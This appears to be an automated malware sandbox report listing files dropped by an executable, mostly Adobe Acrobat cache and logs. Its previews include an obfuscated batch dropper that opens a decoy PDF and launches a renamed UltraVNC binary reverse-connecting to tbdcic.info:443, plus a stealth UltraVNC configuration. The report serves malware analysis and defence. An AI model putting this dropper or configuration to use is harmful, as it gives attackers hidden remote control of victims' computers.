                                                                  SHA1:3176E30F166A140CBA842DCF49793149A2604D67
                                                                  SHA-256:92ACD4A5799536B098BE593BF112ABB6F8CC3F7EF3D85E1DA538B39E8F64FB07
                                                                  SHA-512:FE7F67B5D2D79DAA70932E54E398934E17DF752FF6E4F30F85E17C9FF1AA8B4B319608AF0E090A0876485AA8EF49156572BD38B9F6B5B38D92610EB7C3880944
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):5.220686980902129
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJTqgFCrPeUkwRe9:YvXKX5VqYpW7EGTq16Ukee9
                                                                  MD5:7FE5CC4C1DB35D8C77A4BD9D8CDAE77F
                                                                  SHA1:246F5D4ECC26948C0B3E6EDD56ED482B7297EE8C
                                                                  SHA-256:F4400108AA1460DC901D97C257F859E18D0BABDB0183A9F941370CF80C20261B
                                                                  SHA-512:97CBD72FEA25676CDF666C5BA764C78EFB8ACB8CDFAE1F766E0A9C52536BBB88CF2A78176ECF814032206F2AD9606F1EE4E1EEA25DC996FF6FDF0BBA5E3DB744
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):0.8112781244591328
                                                                  Encrypted:false
                                                                  SSDEEP:3:e:e
                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                  Malicious:false
                                                                  Preview:....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):2814
                                                                  Entropy (8bit):5.1407104949892
                                                                  Encrypted:false
                                                                  SSDEEP:24:YRea3CayHv+JsmCkWrYjTs8FbZuj52oj0SCThm2r2LScCaDnYJDs2FZ56o9eVGru:YQrmCHyFE8qpiK1YJDs2nT9UGy
                                                                  MD5:F956F501D183F1A5752FAAFC66839138
                                                                  SHA1:38A299EDD54007A6A704589DF92B109DFE08663B
                                                                  SHA-256:A4FA0225184FB35212029D6DB092B24F0ABC03397D10FF9BBDCBF0B042075232
                                                                  SHA-512:B89BD3AC3DD4448D5523883270CACBD1C3C649549F249AD02E0C1C539FC53A81019B8EA5AA48788BCA3474C8FB7B0A98EA4F5A15ED2852CA937C25CA6F5C31B1
                                                                  Malicious:false
                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"7c95fe3caa79a3524d01819b2db43cc1","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734956961000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"0971297107b193b31d045b99db5e534d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734956961000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"246a541366f44e8034c78e5ca21720b2","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734956961000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"7d1b325e0e98ec0bedec5cde69100b29","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734956961000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"5fa468dc7ecfb7a7305e9bd302ddcfa1","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734956961000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"933016c959d7d6ad9de07517dcfae9f0","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                  Category:dropped
                                                                  Size (bytes):12288
                                                                  Entropy (8bit):0.9854217771248548
                                                                  Encrypted:false
                                                                  SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/Sp2vLd4zJwtNBwtNbRZ6bRZ45vLdF:TVl2GL7ms6ggOVpo2zutYtp6Pm3
                                                                  MD5:C0216B7A2C6F8C762B56198FE06E1666
                                                                  SHA1:EA46641BDF25DCC8BFA99B29642DB4117C209E85
                                                                  SHA-256:CE6448FDE0C843D7267200A90E34C5E0A7DBD24D91AC11946117876B2D04A08E
                                                                  SHA-512:C255EAD5347D5FF29C1C163CB8697245FF564CEB9FAA99A30AE384F1CF3F85C85C0323DA09C7FA1CAD4757B839378F2801E9D7306B4C21CFEA2F8202EB61DD2B
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):1.337624118517311
                                                                  Encrypted:false
                                                                  SSDEEP:24:7+tphhAD1RZKHs/Ds/Sp2vLdPzJwtNBwtNbRZ6bRZWf1RZKjVRqLBx/XYKQvGJF4:7MjhGgOVpotzutYtp6PMmRqll2GL7mso
                                                                  MD5:66AC29103993D3FFF69D7859553FB06B
                                                                  SHA1:40D979A3D24623651BD77CF4536F4FA699B4A74A
                                                                  SHA-256:1D088EB0307BF904041DB360550EAA8B66EB71DC481B949C8B309F2AB4AB9FEC
                                                                  SHA-512:49B74DD4976596416FB1CAC3A5831FA475CB963BCBF5DEF245E32D2BEEB3D4C7CD20A2E71700891E7CB0257F69C3350DF2CC5A1B28AC02C1511BE99A4A821526
                                                                  Malicious:false
                                                                  Preview:.... .c.......7U......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):66726
                                                                  Entropy (8bit):5.392739213842091
                                                                  Encrypted:false
                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgrW6t4+bqvFgyay5n4Eij4P0Yyu:6a6TZ44ADErW+4+blycU0K
                                                                  MD5:E17F31AF2F6A25A366831F968E846073
                                                                  SHA1:F460F9E2E21F0100421BEC4C3D8975AA90C7F386
                                                                  SHA-256:D253E84D86248B3916253C02B364AA01C64C120E09D1A05D57D60F304C156632
                                                                  SHA-512:4B747EB30DFB22902BEA49E0A127B06AB2A00BA78CED7A9619883F3E8AAECF4A3391DF0B23B2D63947EA80D5BDAFCBB36E12F1F81F698D675F169A1F52181863
                                                                  Malicious:false
                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1063
                                                                  Entropy (8bit):5.595995239629694
                                                                  Encrypted:false
                                                                  SSDEEP:24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
                                                                  MD5:38910F2D879725612BA1097E1F825C1E
                                                                  SHA1:99F3C92122A6B333F94304DEED7D55D140BD9456
                                                                  SHA-256:6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
                                                                  SHA-512:BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
                                                                  Malicious:false
                                                                  Preview:@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):867840
                                                                  Entropy (8bit):6.386550733462827
                                                                  Encrypted:false
                                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: T8xrZb7nBL.exe, Detection: malicious
                                                                  • Filename: Olz7TmvkEW.exe, Detection: malicious
                                                                  • Filename: mSRW5AfJpC.exe, Detection: malicious
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1945368
                                                                  Entropy (8bit):6.532894678367002
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: T8xrZb7nBL.exe, Detection: malicious
                                                                  • Filename: Olz7TmvkEW.exe, Detection: malicious
                                                                  • Filename: mSRW5AfJpC.exe, Detection: malicious
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):605114
                                                                  Entropy (8bit):7.931189302613814
                                                                  Encrypted:false
                                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                  Malicious:false
                                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:Generic INItialization configuration [admin]
                                                                  Category:dropped
                                                                  Size (bytes):858
                                                                  Entropy (8bit):5.216893826927931
                                                                  Encrypted:false
                                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                  Malicious:false
                                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):246
                                                                  Entropy (8bit):3.5197430193686525
                                                                  Encrypted:false
                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkN:Qw946cPbiOxDlbYnuRKDlDN
                                                                  MD5:356FFDCC684855A59598ABC6CFC05E4E
                                                                  SHA1:460F1C1E21E731AA9552EE1E81D9720164C2229B
                                                                  SHA-256:223F28B168F6CC7AFDA8643E6FB4AEC74C3146D06A57D95E985766F54BB145D4
                                                                  SHA-512:9EA151C7157C7F678B86A3B82ADA0D7B92A18C26BE331EBBC67DD8659D23C138AD4701A6B17524162005A12783CC8765ECAE47F21A3A59EC4E8A0C02EE3098FF
                                                                  Malicious:false
                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.2.9.:.1.8. .=.=.=.....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393)
                                                                  Category:dropped
                                                                  Size (bytes):16525
                                                                  Entropy (8bit):5.376360055978702
                                                                  Encrypted:false
                                                                  SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                  MD5:1336667A75083BF81E2632FABAA88B67
                                                                  SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                  SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                  SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                  Malicious:false
                                                                  Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29752
                                                                  Entropy (8bit):5.402505799794783
                                                                  Encrypted:false
                                                                  SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbz:/
                                                                  MD5:C05DB1121EFCAFBA3CCD51F33646E1C1
                                                                  SHA1:82ACAF4319092DFF6382229C0E1BE107D35A6BEE
                                                                  SHA-256:29F4F3DF19CC068B3D2A1E5D5E454B115606B9E95106FB4AA6C5C7ACD5195028
                                                                  SHA-512:5C7D59317F73C64E7FE3A23CA3807BD14EF43794DDC1322486D5608465EEC8518F5D62E09957C89311AA03D4B17D67CD3AC7C23223D98D4C1F0E654E73DE5F3F
                                                                  Malicious:false
                                                                  Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):605114
                                                                  Entropy (8bit):7.931189302613814
                                                                  Encrypted:false
                                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                  Malicious:false
                                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1063
                                                                  Entropy (8bit):5.595995239629694
                                                                  Encrypted:false
                                                                  SSDEEP:24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
                                                                  MD5:38910F2D879725612BA1097E1F825C1E
                                                                  SHA1:99F3C92122A6B333F94304DEED7D55D140BD9456
                                                                  SHA-256:6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
                                                                  SHA-512:BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
                                                                  Malicious:false
                                                                  Preview:@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1063
                                                                  Entropy (8bit):5.595995239629694
                                                                  Encrypted:false
                                                                  SSDEEP:24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
                                                                  MD5:38910F2D879725612BA1097E1F825C1E
                                                                  SHA1:99F3C92122A6B333F94304DEED7D55D140BD9456
